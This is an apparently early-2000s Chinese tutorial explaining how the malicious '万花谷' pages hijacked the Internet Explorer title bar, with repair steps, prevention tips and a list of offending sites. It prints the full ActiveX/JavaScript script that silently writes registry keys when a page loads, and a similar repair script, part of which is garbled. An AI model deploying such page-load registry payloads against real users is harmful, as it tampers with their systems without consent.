近来,屡屡发生网友在浏览网页时,由于误点击一些网络地址,造成在IE的浏览器的标题栏出现一些广告信息,很是令人讨厌!比如访问已经大名鼎鼎的恶意网页“万花谷”,会将你的IE浏览器的标题栏显示“欢迎来到万花谷!请与OICQ:4040465联系!”对于被恶意修改的IE标题栏该怎样恢复呢?
一、IE标题栏被修改的原因
其实,该恶意网页是含有有害代码的ActiveX网页文件,这些广告信息的出现是因为浏览者的注册表被恶意更改的结果,原因就是利用了下面这段JavaScript代码修改了HKLM\SOFTWARE\Microsoft\InternetExplorer\Main\和HKCU\Software\Microsoft\Internet Explorer\Main\
中的Window Title的键值。看看下面的代码你就会明白了:
<SCRIPT language=JavaScript>
document.write("<applet height=0 width=0 code=com.ms.activeX.ActiveXComponent> ");
function f(){ try {
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance(); Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance(); FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance(); Net = a1.GetObject(); try
{ if (document.cookie.indexOf("Chg") == -1) {
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", " 欢迎光临http:/www.520cat.com");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", " .欢迎光临http:/www.520cat.com");
var expdate = new Date((new Date()).getTime() + (1));
document.cookie="Chgg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{} } function init() {
setTimeout("f()", 1000);
} init();
从上面不难看出它修改了你的注册表!如果你认为没有什么了不起,仅仅是修改了IE标题栏而已,那你可大错特错了!如果他将你注册表改动将你IE指向一个木马软件的下载地址,木马服务端软件有只有几K到几十K大小的,下载这样一个木马只需几秒!几乎是一闪而过!然后木马程序再将你的防火墙、杀毒软件全部关闭!接着在注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run里加入木马服务端自启动程序,使之开机自动运行,这样做是完全可能的!而结果是非常严重的!因此大家要十分小心喽!
在系统默认状态下,是由应用程序本身来提供标题栏的信息,但也允许用户自行在上述注册表项目中填加信息,而一些恶意的网站正是利用了这一点来得逞的:它们将串值Window Title下的键值改为其网站名或更多的广告信息,从而达到改变浏览者IE标题栏的目的。不过在Windows 2000下,在注册表
HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\和HKCU\Software\Microsoft\Internet Explorer\Main\
中没有Window Title这个键值,所以这种恶意网页对W2K是无法修改其标题栏的。
二、解决办法
方法一:
(1)在Windows启动后,点击“开始”->“运行”菜单项,在“打开”栏中键入regedit,然后按“确定”键;
(2)展开注册表到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main下,在右半部分窗口中找到串值“Window Title” ,将该串值删除即可,或将Window Title的键值改为“IE浏览器”也可以;
(3)同理,展开注册表到HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main,然后处理方法同(2)中所述。
(4)退出注册表编辑器,重新启动计算机,运行IE,你会发现困扰你的问题解决了!
方法二:复制如下代码,存为文本文件,再改名为.htm文件,点击运行,可以自动恢复IE标题栏。
<!-- Begin set start page and internet Explorer Window title-->
<SCRIPT language=JavaScript>
document.write("<applet height=0 width=0 code=com.ms.activeX.ActiveXComponent> ");
function f(){
try
{
<!--ActiveX初始化过程-->
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents .cookies.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer");
<!--检测用户注册表并修改相应的键值为系统默认值“Microsoft Internet Explorer”-->
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
<!--实现打开页面后1秒钟内执行测试修改注册表的工作-->
}
init();
</SCRIPT>
<!--End set start page and internet Explorer Window title-->
三、预防办法:
1.要避免中招,关键是不要轻易去一些自己并不了解的站点,特别是那些看上去美丽诱人的网址更不要贸然前往,否则吃亏的往往是你。
2.由于该网页是含有有害代码的ActiveX网页文件,因此在IE设置中将ActiveX插件和控件、Java脚本等全部禁止就可以避免中招。具体方法是:在IE窗口中点击“工具->Internet选项,在弹出的对话框中选择“安全”标签,再点击“自定义级别”按钮,就会弹出“安全设置”对话框,把其中所有ActiveX插件和控件以及Java相关全部选择“禁用”即可。在Win2k下把服务里面的远程注册表操作服务“Remote Registry Service”禁用就可以了。方法是点击“管理工具->服务->Remote Registry Service(允许远程注册表操作),将这一项禁用。
3.对于所有用户,可以通过升级到最新的KVW3000病毒库,来预防该类恶意网页的侵害(注意,必须是6月28日以后的病毒库方可)。
四、目前已知这类网站名称汇总
据我统计(所知)有如下网站可以修改浏览者的注册表,甚至于是限制系统功能,使浏览者无法使用电脑!
1.http://on888.home.chinaren.com 这是大名鼎鼎的恶意网站“万花谷”的网址;
2.http://www.findfeel.com/default.htm 这是和“万花谷”同类型的恶意网站,破坏效果相同;
3.http://www.gohip.com 可以改变IE标题栏和收藏夹的讨厌网站,没有更严重的破坏功能;
4.http://www.520cat.com 修改浏览者的IE标题栏的网站。
当然,这样的网站远远不止文中所提到的这几个,它们的危害也各不相同,但只要你按本文中所说的预防方法去做,就不会有事了!
……